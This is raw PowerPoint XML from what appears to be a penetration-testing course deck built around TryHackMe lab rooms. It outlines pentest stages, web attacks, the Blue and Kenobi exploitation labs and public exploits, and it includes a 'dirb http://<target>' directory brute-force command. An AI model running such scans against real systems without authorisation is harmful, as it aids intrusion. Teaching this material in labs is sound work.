        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644624" y="5872063"/>
            <a:ext cx="120253" cy="211435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1625"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="5801619"/>
            <a:ext cx="1928515" cy="220266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1708"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1375" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Web Application Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480046" y="6106419"/>
            <a:ext cx="10218638" cy="225524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1083" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploring common vulnerabilities and attack vectors in web-based applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083"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D66D26-D32C-C2FD-EBE6-3D63BFA6DF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699713" y="248038"/>
            <a:ext cx="7063721" cy="1159200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 Rooms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Fundamentals and Principles of Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18883F48-0930-E4B6-6A03-BC6F8C0DB9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572499" y="390832"/>
            <a:ext cx="3233585" cy="873612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="200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C6B36B90-E490-5CCA-6DD4-347BB9246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8856" y="0"/>
            <a:ext cx="4063142" cy="1574310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FE0706D-F049-9E66-79B5-BE0F3BF6F311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543231" y="1798070"/>
            <a:ext cx="11093245" cy="48118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err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> Methodology: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>five stages of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Reconnaissance, Scanning, Gaining Access, Maintaining Access, and Covering Tracks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Tools for web directory and file brute-forcing. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> http://&lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>CIA Triad: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Confidentiality, Integrity, Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Security Mechanisms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Authentication, Authorization, Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tools Covered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> http://&lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>OpenSSL:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-EG" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Used for generating cryptographic keys, certificates, and encrypting data.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>openssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> enc -aes-256-cbc -in plaintext.txt -out encrypted.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342221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2165053"/>
            <a:ext cx="7173615" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="5041"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4042" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Tutorial and Vulnversity Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4042" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031" y="3322241"/>
            <a:ext cx="2571750" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Tutorial</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031" y="3849390"/>
            <a:ext cx="5125045"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Introduction to TryHackMe's platform and how to use virtual rooms for learning.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353274" y="3322241"/>
            <a:ext cx="2571750" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Vulnversity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353274" y="3849390"/>
            <a:ext cx="5125045"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Hands-on practice with active recon, web app attacks, and privilege escalation techniques.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583"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571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031" y="3469084"/>
            <a:ext cx="5469831" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="5041"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4042" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Blue and Kenobi Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4042" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031" y="4420593"/>
            <a:ext cx="5273179" cy="1540073"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5611"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938411" y="4638973"/>
            <a:ext cx="2571750" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938411" y="5083870"/>
            <a:ext cx="4836418"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Exploiting a Windows machine by leveraging common misconfigurations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6198891" y="4420593"/>
            <a:ext cx="5273179" cy="1540073"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5611"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6417270" y="4638973"/>
            <a:ext cx="2571750" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Kenobi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6417270" y="5083870"/>
            <a:ext cx="4836418"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Linux exploitation focusing on Samba shares, vulnerable proftpd, and path variable manipulation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583"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9786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="391617"/>
            <a:ext cx="4837509" cy="444996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2792" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Advanced Exploitation Module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2792" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="1050231"/>
            <a:ext cx="355997" cy="355997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="1548607"/>
            <a:ext cx="1780083" cy="222448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1375" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Vulnerability Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="1856482"/>
            <a:ext cx="6623248" cy="227807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1792"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1083" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Advanced techniques for identifying weaknesses in target systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="2511524"/>
            <a:ext cx="355997" cy="355997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="3009900"/>
            <a:ext cx="1780083" cy="222448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1375" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Public Exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="3317776"/>
            <a:ext cx="6623248" cy="227807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1792"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1083" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
